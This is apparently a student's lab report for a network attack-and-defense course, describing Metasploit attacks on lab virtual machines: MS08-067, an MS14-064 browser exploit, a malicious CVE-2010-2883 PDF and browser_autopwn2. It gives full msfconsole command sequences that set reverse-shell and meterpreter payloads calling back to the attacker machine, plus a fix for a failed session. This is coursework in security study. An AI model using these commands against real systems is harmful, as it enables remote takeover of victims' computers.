20202402 2021-2022-2 《网络与系统攻防技术》实验六实验报告

1. 实验内容

1.1 实验要求

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

1.4 成功应用任何一个辅助模块。

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。

2. 实验过程

2.1 一个主动攻击实践,尽量使用最新的类似漏洞

MS08-067
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

msfconsole
search ms08_067
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.87.133
set LHOST 192.168.87.134

在这里插入图片描述
但是这里会报错,Exploit completed,but no session was created. 解决方法放文末了。

2.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞

MS14-064

msfconsole
search ms14_064
use exploit/windows/browser/ms14_064_ole_code_execution
set AllowPowershellPrompt true
set SRVHOST 192.168.87.134
set payload
run

这时他会给你一个攻击网址,如图在这里插入图片描述
在靶机浏览器打开这个网址
在这里插入图片描述
这时候攻击成功,使用sessions -i 1获得了靶机的shell,使用截屏命令截了一个屏也有显示
在这里插入图片描述
在这里插入图片描述

2.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞

CVE-2010-2883
Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。

msfconsole
search adobe_cooltype_sing 
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp   
set LHOST 192.168.87.134
set LPORT 2402
set FILENAME SBBCC.pdf
run

在这里插入图片描述
可以看到生成的pdf文件
在这里插入图片描述
在靶机里使用adobe reader打开这个pdf
在这里插入图片描述
这时候kali会显示攻击成功,获得shell
在这里插入图片描述

2.4 成功应用任何一个辅助模块

Browser Autopwn
Browser Autopwn 是由Metasploit提供的一个辅助模块。当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。Browser Autopwn在攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozilla Firefox浏览器,而只会攻击系统自带的Internet Explorer7浏览器。

msfconsole
use auxiliary/server/browser_autopwn2

大致过程和任务2是一样的,也是生成一个网站,在靶机登录以后会获得靶机shell
在这里插入图片描述
在这里插入图片描述

3. 问题及解决方案

任务1里面Exploit completed,but no session was created报错,是因为没有设置target,Metaexploit会使用默认的Exploit Target 0,我的靶机系统是Windows XP SP3,需要设置target为34,就ok了
在这里插入图片描述
在这里插入图片描述

4.学习感悟

现在做了几次实验发现漏洞确实多,各种姿势获得靶机的shell有点意思,搞得我都想攻击别人了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值